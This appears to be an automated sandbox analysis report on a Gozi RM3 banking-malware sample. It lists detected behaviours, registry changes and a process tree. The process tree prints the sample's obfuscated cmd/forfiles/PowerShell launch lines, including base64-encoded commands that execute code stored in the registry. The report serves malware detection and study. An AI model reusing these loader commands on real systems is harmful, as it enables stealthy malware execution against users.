Analysis Overview
SHA256
bd8aa280646a2b601ccbd5cec125d51646624d34005eb7db56da6b70fda821cb
Threat Level: Known bad
The file 520636dbbdc33d8dbdf1b14f043b46f8.exe was found to be: Known bad.
Malicious Activity Summary
Gozi RM3
Deletes itself
Uses Tor communications
Drops file in System32 directory
Program crash
Modifies Internet Explorer settings
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-15 14:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-15 14:05
Reported
2022-03-15 14:08
Platform
win7-20220310-en
Max time kernel
4294211s
Max time network
158s
Command Line
Signatures
Gozi RM3
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Uses Tor communications
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000848de11a691104a4a7621763c329328b3aafae11240aada6b98e1e8e4316efba000000000e800000000200002000000033961ac82e3b91e722cea73c4c855d66e882ed23618be401c2b7d4a2d835fe6930010000aea24903b1f8b8839e597eb09610f9cea839664384b047fa634ce18a229ed4ced27a94a9bedff63463d0eae5ca54774a9e634d18800389ddd4d6ef383866d50b8c8592ebf76917c6e7f6262c644c5eae283cd21108b2742e5b43e2b728e1dba4054e90cf92954f3410876cb4f2bd0dab0b509f30edcc4ca278230aaf0597b30b535774eb9b0e6104e059eac051e461307b6eb87313924a781b13b3a4afe3894d4595461caddd7f0947c2482dd87804b616669bb200a190ce6273c53e9c99cec9a913667e972bdf3f195c4e447de2ed7a7451cb04727fa4023558ea2711b87e12a949af914d2681b612cf5653f5d8ab7b797bbc880620358241a7ca64702b56ad9b41389312e0e6e2c44dd0faba7c35bb65d2e3aac29db12cd4e2e7375d537fe947cdd6bdf6ae6b2cac346ecfc960eaef400000009f062d4b0dc30d1b6b15907bc63decdf8d49a1277613928f5ee01c2c50698b7c8e9866c17d4b7cbb974b54cc229788159f31d3a192340026c476f3122dd05239 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000c2a6ae86826be4047133c7c7dcc86b768e5ba045c4e15af6aef05b91cf3cba84000000000e8000000002000020000000d33dccbc349c7a3ab621c7e37f5960b05b3564231a365a9f4d9d4bd46b7aac28300100005bb4a93d19191c934a7f1ea60357c5c09a967ea5774a4912fe2fee1b64d094d7eed429f574b4a894c71412d67716503619a39646a5adf8b0bfa52557b6ff22b2153120982dd84b2818c2f0092c2d29b4bdf5457e1ea2856f365b4b36806ed18bb6d1530ab4747944eeeee506edf486738e63c19151cf4e4502364c7dfae22d68cd32a866cd291332eb4a64e61e0cdc1a2940e9b547f8be744f90199096e7d18312be8a6f861388b7d9d6f3b85ea4222845e823e61b771d99697a6d8ab123929a46b38d346e16a2df77d7eec8b116595990fc9aecbfcd16b09ed9948f82a5621a4edad10f71f928370c47e43e4a97cc57274a50bfa143377ab371cbbb40a58aab45b75b68877d16e8e7a3890ceb68c8ee8ab809628efcfd25dc96f5b24ec6ec1c917d02f0978340e27047fab299a87fc640000000845256ab7d3b0aef3dcb07236ed3d63772fac2dc72adafca6ab5d382b095d734b0d53dfe89ad8ac4fd7856d60e264d0d08f05d0ac78af84262526135d46a4919 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e50000000002000000000010660000000100002000000038820fba66496241cf9700077d97233f36089d05dcc089baa312ca1a96d9c2aa000000000e80000000020000200000006b7c7609116fe14d83cdb94adc9834244c3c71c36ccb17ac54e7c9407362d28530010000862b7a0a43c886bba981399e1a1fa564f73a8111600805c429b72c78fba68a4636ab39b63b14c3cdc1975dbd8458800e9cc894f50de0afb8ca796319a176d0b3987ce3d2cb9c6b5049b9b40e8a9e62572486e975b6f08c5c58219fa75013e78f8aedfe970b56e81f1ee38d5f4f288b5d467ffc9e477c6036b4a1866f941dfabcb3a1ea9073e445e7cdeb05d3ef1d975cccb3eafc5248317c418eac650c7e4cdd08ae3c5fb55163d88854c85cc3699cc8a70d8a65d83ea11cb8c8e4ec9930f655689035cf09acf0f9ac84922efe607817599f60e038094ef9473bfd48ac6e7eb92bfa34e1ce861e03998728318c82e11a5a3a9c2981e86ccc8388c2c40487fe71fd2c5c4d593e4e1dd2b0d9ac51fe8c3c90b7c8f5ddff96832756bab41508ec3cdcb755c1976a4d3d0844af32d27574ed400000008e74336338a83c2c2dfbbe6582757fb0cfddda26c078bdd177d1dc7b46613da9d293c0d351e584799d7b6e0474b6f28e8abe8f401ce8b15f0680f9c52954445c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6400000019000000ea0400007e020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 406df82d7e38d801 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000004da70a2a8d8f657ee493617ead9bfa85ff5a3a40dac172efc4c9069ad3ea209e000000000e8000000002000020000000e4122a9fad8930f138dc068757f584bdb351ae9d297010c6279fa44333f0d31f30010000474375028df37e5a4ca764379726aec4a9856dc73f396be4140a6e6d57c1ae1f902f0962842595965e0986230b281676444065eba59588573d05c03b3edb815290d2357b40effd4ef00deb86a07f4308f9a9efab5eb64d587abe57ca2d73c3ba0705545472c522c9532175c21a55070ccf1e8b080877bcbb07f6eca41196ce7404ae8ebebd7d0b0b043987453de9f74d01a9fffbfce09499c380698dbd12f8fe433b4e086e58b31d0631ad7c645c7272f917c399abe77e0d0e7edbf3e19646570a7fbd711a7b7899f91c4413f343a54ea34b3d54f647228c0dc17d753a8b737577f530598c388601ccb6b08c99420550a405527521a4206db8b233b32c607ddaef4d04f826ee87a771f7e20403b6c457b691870a4cc0a4cfb490adf85cde6597ce4047c806060c0e889fa7d7f5522b3640000000822ef81260457029cf7a39416f17b1e82472dc6f1c4c68333a7c2ea2a1c0637a50cff14c9bf5568a69d8b4a1a9233cfdaf3adbd701d23bc2a4b6ca16b29ec4e9 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{60815881-A471-11EC-ACC4-5A7BB634C6F6} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000fa5acc32a29e8820665400d28932650271f18652831449b5364d513e490d840f000000000e8000000002000020000000e5b77292f411cc1dd3dd2992ac4c0e153201eb4c5391f1304942fbd41e005fcb3001000029ed0abb74debf6443f8f9297ac44d38a27674fec2c1395dcd70e4236f2e1e4aeddb7d110153fdf83aabc2bffcadb01b71b08242c54553691253424fcc70c6e6c14b549556a5170bf1129743fd2f3d1253449430fa3958bbca10ec8f25426dcae2b8a89e755d6464aab57155788472561bc8081d937bec8e7971a0135d4470bdf1dd54ee2d6b09a4d4528fc4318d21ff4f3c39e29ab7c72bae8d13eca45a2a5c1e302313ff5f60aa5692bccdd56b17cc23440029c485e99795143653814328b8a6420f7fc7c9f49f9474367cadf235454ff734efa4e53d1d90c9ed8f8271b3acc8cb2a28eeb89979ed83f3403134036ec62dca8fe25cc5e062365ce4db57150c422e3a524515be0d40ecba8d590ef1c5802542cf501c26abbd9dd64dd1cbb58c48c08afe75e996dca43f968a4802109d4000000040f546d20bb12a27789a07519202d014b2c4c8749c3eb2834a86c597f08fa68d40ad23475e3c828e7c515e9ded1d58dc94d5cb267c7bf01cd64076015346b8e1 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000007164a8aa0278030caad5712525f19cc3b5e421a299aa25615e2712d144b03736000000000e8000000002000020000000de34d9e6a8c8cae055431619d02e81a3c7343c0f7fc1e142c8968139dd736a399000000028659c0277fee02be012aaf72256cd68966795c6fa850f04c61aa0ab94bf8525afcb7d45a6fda3f8cbb76d5bf8067595530e3073608a60058aa340775b966d8f8e2f45da05b298d2f763bf0b1b42df0e3d52d955956f284c5d01fbbb45278974c5a1f43bc2b2215f6eec965aaee911c552487e070b3b4d3b76c21110378ff68be3103d5d7ab68b1adb063b868eaaf8e9400000009a64f00d6404739aaf28608b30263eb34584d8dbb5250cfcbdc610aeab75cedd8df7dd6e7549bd7ee22f13dc46b2785eaca9fd0d2570fbeed4229d06c7529711 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000c0e3c8076960ba661f9913e22f8bee511a511c6341b43d35f84af669ab444989000000000e8000000002000020000000d7cc88cf612901c2668c545b39ce96c22ae1773585c7bda6b1cabca272e8027230010000a55f877eff2bef3f72ab0539bb5f1dd036a4a863139ce845f80ea5104a8eab2b44fa72e271287b05d26051addf4a598215d4909b321ea8442647f828290bff39417317afb869fec6024318d9fdf4545913684ab3a958904c247fb15840a607c65989810b22b0e98534832a9f8a306a3864c4a9f12f485e0206dbb3f8e708c710f2f0761cec570e4bae8c3fbde561b09005d5c2c97f02aaeed3cab739ed54c388871062e16ef1dd09166c037169b115ac02299232b031ce3e1f5e6ba8fe786e9de0a5b9aa34cbe80e58f1e14611aa56f6a652476a80be27a794d4d0a4eb0e5c099b6ae2dffd20cf1857df5775a29cfa578ec3969677d30880be3c4067d045403c56df3ecb2d7475bfbe84b27623051853d6303c17f34438d11df24a71ecf69992b601da0d20083d90d003471cc8bb1f40400000006d22f5a04e32e5a3d8466edeacf932dba5d49c1f8eee51a3663a413f9a0941e0d950101752db7aa20f486c6f425732b3170a950342b394e7f6522523e57deaec | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e500000000020000000000106600000001000020000000c2797f40edac4b31681b03d7d44b72216d8c449a336471011bf238c0fc52c61a000000000e8000000002000020000000f41c85d1de46350762f16ad5549d664ef80e28256772f4783637074a5527187530010000be1bd8744b35b473beb215677ef029eca1384d1f38ab64a155ab9074cb0a9e5e3d2067d9ffbae84c506bf1e2803e3b63a0970c4ea3243c599787ec195f4427348ef919aa1c5102bfb9b4f5e31f84055b9a76c11215fdeef9343cae1f9e36d8d33903204852b9fceb7a2bc6b702a01a075627d40a980e3083af04638aeeb298f6ca205fbb6a76fa6d3bb3a934cbc43935748a7589e4dae69b9e9ad61832e1027943ff96be7ae6e0eb352867d6c4b63e313b2cb2d185f9f609226d6fe199b51f7f7c5dacdaf6aea5efc208aab99affbb23a45b7ff8c0d1de1dbff1e821a824038c0e6fec36092ff182089b63607697e202d4b5c7d77db5ec373a9420cbd5ac88ece960a8d87f2f502aa4985fb1dc3dd8d7e5c1310d1e50c65546db7f5d5f7a6ef7911d47f1e99881683e32a5967adc9a18400000003db41519f06a057313287039bdfa979e80672fdf21599526630f248d60b58f0fd24babb30d4f807e71b09203803895d91bc32d75d5a56e1e62fcb42acdb81a17 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000003c553aceacc9c3d1ea9900fef69b5e4d4ff339bb25ed4baa739946f9d7884d54000000000e800000000200002000000009466dcf8b39ce8940293b538d90e128e01e1b6f9419c346a4934f0985e8a0f22000000003186fea220cdd2ec20d54cf21108ff4371086526455f4c4fdc5c69e09cae2ea40000000532736d937bd0ebe623f6a3d0bdfd550697ab1d05204c1763c0449ed5bfc18ff8df4e18e8b246f0d7148607c3394291e170835115dbea538f2774adea503adfe | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004dda8e4cddf84341b86bc814e98354e5000000000200000000001066000000010000200000008d6ab81c0add1a71a83e6d19c1a86685433e44dbd4f93b9eadc54382f5ee8105000000000e8000000002000020000000baa5ae7a34ffe3160257822823aebe40fa4c8aa180f5cb0b95876618eb705857300100001bf98b54daefb1bb44ce44eaa7a36cf75a4adafa801b45316bf42c1e54d1507bcbaff6a5fbd8917ba62150046d5c8d4a6396a45f2a5ff2d8008f0d9c584b825ffb5d1f31db7226ad0c386841963b6fa652859e05911dbda433f5bd5cadb91ae09e387bb3e09681510f8de019c765abebea2aa6d8d9ab038c70390e52d82edc7714175cbc82eb53444865a628b9e2333eaf1ab216d7284c61736c1df03ccf47c03efdc69d4e08659f1de4b64e7717904c7dadaab3f0ec62cac80026276330f00519faeec9054f2f4eb82e12793bc5eb5074e58a9150ca021143d1ef5767d5cf4e2c432ec2cb08bd1ba7585b965c9945119158077dac80db84d0d0acb7dbcf3c6572006be2b2af0d262d0370825c0ad988e19a03d16dbbe3ad3534af466fc705f8b31e0acaaa395a649a709a1dfdaf6fe84000000015d5dd4e0211195b0d8a39d23c4b702108f7289d9611026501a3dba0b3e6929b7a5458a427008f7d6dbe1505362289050631046d61c0d3d24254b5f5bc924fb2 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe
"C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:996356 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\cmd.exe
/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
